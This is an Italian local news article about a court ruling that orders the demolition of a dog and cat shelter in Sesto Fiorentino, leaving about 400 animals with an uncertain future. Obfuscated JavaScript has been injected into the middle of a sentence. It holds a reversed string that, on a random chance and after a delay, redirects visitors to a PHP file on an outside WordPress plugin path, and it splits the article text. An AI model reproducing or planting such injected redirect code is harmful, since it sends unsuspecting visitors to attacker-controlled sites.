Anche i cani sotto sgombero

image_pdfimage_print

Il canile di via del Termine dovrà essere demolito. Il Tribunale
amministrativo regionale della Toscana ha respinto i ricorsi
contro l’ordinanza del Comune di Sesto, sentenzi (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ando che i rifugi
costruiti per gli animali ospiti sono “illegittimi e abusivi” e quindi
vanno buttati giù. Inoltre l’Unione Amici del Cane e del Gatto e
gli altri proprietari dei terreni sono stati condannati al pagamento
delle spese di giudizio. Il sindaco di Sesto Gianni Gianassi si è
detto soddisfatto. Assai meno contenti saranno i 300 cani e 100
gatti ospitati finora nel canile, finiti adesso in balìa di un destino
nient’affatto chiaro. Per la realizzazione del nuovo canile ad
Ugnano ci vorrà infatti ancora almeno un anno.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *